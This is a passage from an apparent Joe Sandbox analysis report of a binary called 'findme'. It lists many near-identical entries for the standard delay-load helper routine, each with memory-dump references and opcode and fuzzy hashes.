                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: e5dac5f689337b69a4f7e48c374aef3f7efe3c52d834fef7dbf15e2c7fa840eb
                    • Instruction ID: 6eac31ff56d40b41eb3f14402c3655bbe502fb3630398b60c39d556ab56082fd
                    • Opcode Fuzzy Hash: e5dac5f689337b69a4f7e48c374aef3f7efe3c52d834fef7dbf15e2c7fa840eb
                    • Instruction Fuzzy Hash: 0CB012E5A6C0117C310E7205FD27E3602DCC8C3B14B30411FB109D12C0D4486C06583F
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DD8A3
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: d465ef40027e00520580ed3322e7ce1010a6856d9b674ecbaacfa2dfa08422ad
                    • Instruction ID: a355f6a662ae5cad9f22f3fb89186bce9ef5620812ab49b0503fccae9aeb2ebe
                    • Opcode Fuzzy Hash: d465ef40027e00520580ed3322e7ce1010a6856d9b674ecbaacfa2dfa08422ad
                    • Instruction Fuzzy Hash: E9B012D5E6D0017C310D7205FC26E36025DC8C3B14B30801FB509D12C0D4486C45543F
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DD8A3
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 3087249968b7d60b66924ffebb228f0e73633cfb08aaf188c23cb7a9f3cc12b0
                    • Instruction ID: 958be8ebc6b258716822f05b0c05bb9ef4089a4e016a426e6970986781938b35
                    • Opcode Fuzzy Hash: 3087249968b7d60b66924ffebb228f0e73633cfb08aaf188c23cb7a9f3cc12b0
                    • Instruction Fuzzy Hash: 98B012E5E6D1017C314D7305FC26E36025DC8C3B14B30411FB109D12C0D4486C45543F
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DD8A3
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 7e5ab4cc2ae1849531e4e655340b2c12f0e9c73b35b9b85aaf5b139b73b683ca
                    • Instruction ID: 9de657f1b6487e4073a87449844d0f5cce9588dccf6434cdc94b0ce104318085
                    • Opcode Fuzzy Hash: 7e5ab4cc2ae1849531e4e655340b2c12f0e9c73b35b9b85aaf5b139b73b683ca
                    • Instruction Fuzzy Hash: 33B012D5A6C0117C310A7215FC26E36029CC8C3B14730811FB609D12C0D5486C05583F
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DD8A3
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 4560ff2f6e2625665fe6016c43f0948df344c3edb667d8a6128d8b54972bcef1
                    • Instruction ID: 1c7f5f341bbeee25c0df82d69798687b9947fe6d981f8ebc64f12ce0ecc59d1a
                    • Opcode Fuzzy Hash: 4560ff2f6e2625665fe6016c43f0948df344c3edb667d8a6128d8b54972bcef1
                    • Instruction Fuzzy Hash: 79B012D5E7D0017C310D7205FC26E36029DDCC3B14B30401FB109D12C0D4486C05543F
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DE20B
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: d86e718c898cb63a9e51be964d1e1f297113dea8fce5569cb44ec1abf2f38362
                    • Instruction ID: dbac401e3cc39592388e9718a336d9bda7f3726b7126ba4fd009bc326afd2248
                    • Opcode Fuzzy Hash: d86e718c898cb63a9e51be964d1e1f297113dea8fce5569cb44ec1abf2f38362
                    • Instruction Fuzzy Hash: 32B0129576E0017C320C6202FD2ED36032CC8C1B50730801FB205D81C096484D0A403F
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DDAB2
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 50280e51421cef13cc9696dd2566739dbca362287d0b370ef739256656614a33
                    • Instruction ID: 30f3ce99f4006f30652185f3e8cc067b90fc0cccc973b84e27eb961c1d3ce70c
                    • Opcode Fuzzy Hash: 50280e51421cef13cc9696dd2566739dbca362287d0b370ef739256656614a33
                    • Instruction Fuzzy Hash: 6BB012A566C002BC31087206FC2AE3A029CC5C1B10730C11FB409C0384D44C4C05843F
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DDAB2
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 4cbdb08c9ab3249d824b3bf5775cccc30b475de3fe0654ea1e1f16f04749ddae
                    • Instruction ID: d674222d42a43dfa5ed251625b189492172345c9eea618505521ce209b490ecc
                    • Opcode Fuzzy Hash: 4cbdb08c9ab3249d824b3bf5775cccc30b475de3fe0654ea1e1f16f04749ddae
                    • Instruction Fuzzy Hash: FDB0129566C002BC31087206FC2AF3E029CE4C5B10B30C51FB109C0384D44C4C0A443F
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DDAB2
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: cb2db1a9bc5c715608cbb485f991aea2882ee3cfc1c823f7ad7c7459b33e51a6
                    • Instruction ID: 8be35949881ba464a98c6ed607b4218f1c54b06749a651477567ceef7b9e43b5
                    • Opcode Fuzzy Hash: cb2db1a9bc5c715608cbb485f991aea2882ee3cfc1c823f7ad7c7459b33e51a6
                    • Instruction Fuzzy Hash: 97B012956AC1067C31087207FC2AF3A029CE4C1B10730C11FB009C0384D44C4C05453F
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DDBD5
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 2482df2ecb0af31ff4172e7f9e7ece1204f8a0e5a16302da43e63d77fa9fbb42
                    • Instruction ID: 4e231ca38a3861bb916541ac79875eca1abc2f15c4ef798141c985dc5ccc9e98
                    • Opcode Fuzzy Hash: 2482df2ecb0af31ff4172e7f9e7ece1204f8a0e5a16302da43e63d77fa9fbb42
                    • Instruction Fuzzy Hash: ABB0129D77C10ABC32081216BC2FD37022CD4C1B14730412FB105D018099485C4D403F
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DDBD5
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: dcfb13b0def68880f11b7abc6dfe4b7af886f11b422088318479a3e840faf5b2
                    • Instruction ID: 54bbf3a3ad887c4d2be8cb160aeebd61fe30bd8ea5aba823dd882aef9c37963a
                    • Opcode Fuzzy Hash: dcfb13b0def68880f11b7abc6dfe4b7af886f11b422088318479a3e840faf5b2
                    • Instruction Fuzzy Hash: 25B0129D76C005BC3108522ABC2FF37026CE4C1F14730402FB11AC0280D9485C0D403E
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DDBD5
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 2c713e9862f858fab22cbf777d6822654d945bcc6c7c58a49c814826dc1fe94c
                    • Instruction ID: a2674e5e5524f8464d62bb81a86d592dc1e2834d78102b0b1c474e88ca6bb865
                    • Opcode Fuzzy Hash: 2c713e9862f858fab22cbf777d6822654d945bcc6c7c58a49c814826dc1fe94c
                    • Instruction Fuzzy Hash: EEB0129D76D006FC310C521ABC2FE37027CD5C1B14730801FB509C1284D9485C0D403F
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DDBD5
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: be9a2a37d47614511db534744a95c95540fab1f57db37e8f3d338c7620b1abeb
                    • Instruction ID: e026b99cdd5389b00e8d1517d13cd45b8f5c1b3839c87c7dce1be32ce2f18e64
                    • Opcode Fuzzy Hash: be9a2a37d47614511db534744a95c95540fab1f57db37e8f3d338c7620b1abeb
                    • Instruction Fuzzy Hash: A8B0129D76C006BC310C521ABD2FE37066CD4C1B14730801FB209C0280D9485C0A403F
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DDC36
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 63be2b903b6dbf6f0af94521b17857ebaf3868bb4a82461b52d9608e7cf40cdf
                    • Instruction ID: cc1e58a6e95853e745c53deed07bb7f6ce1d1fb4c5ef5af3639edccce63d8e97
                    • Opcode Fuzzy Hash: 63be2b903b6dbf6f0af94521b17857ebaf3868bb4a82461b52d9608e7cf40cdf
                    • Instruction Fuzzy Hash: 7FB012A9A7C2017C310C6345FC26E36067CD4C1F10B30451FB209D0280D6885C09803E
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DDC36
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 7d9e83ac97d0ba78fef9307730b68dd503a91605e2c505a8c24af9380ee7e09e
                    • Instruction ID: 400e6487c824d1b590665cfa548119f5b5f41650c992d5077f50ba2113766ad2
                    • Opcode Fuzzy Hash: 7d9e83ac97d0ba78fef9307730b68dd503a91605e2c505a8c24af9380ee7e09e
                    • Instruction Fuzzy Hash: F1B012A9A7C1017C310C6345FC26E36067CC4C6F10B30851FB609D0280D6885C09803E
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DDC36
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: d0823b8646db6e5336111dfe16caed5e0571414c504c1c7d2b9a34f9889346ed
                    • Instruction ID: d9e0765b9348cc92742f58f3d41daa9fc9cf9b7cf2b0f973b1459b779dea3603
                    • Opcode Fuzzy Hash: d0823b8646db6e5336111dfe16caed5e0571414c504c1c7d2b9a34f9889346ed
                    • Instruction Fuzzy Hash: 19B012A9A7C2057C310C2341FE26D36063DC5C1F10B30461FB205E018096885C49903E
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DD8A3
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
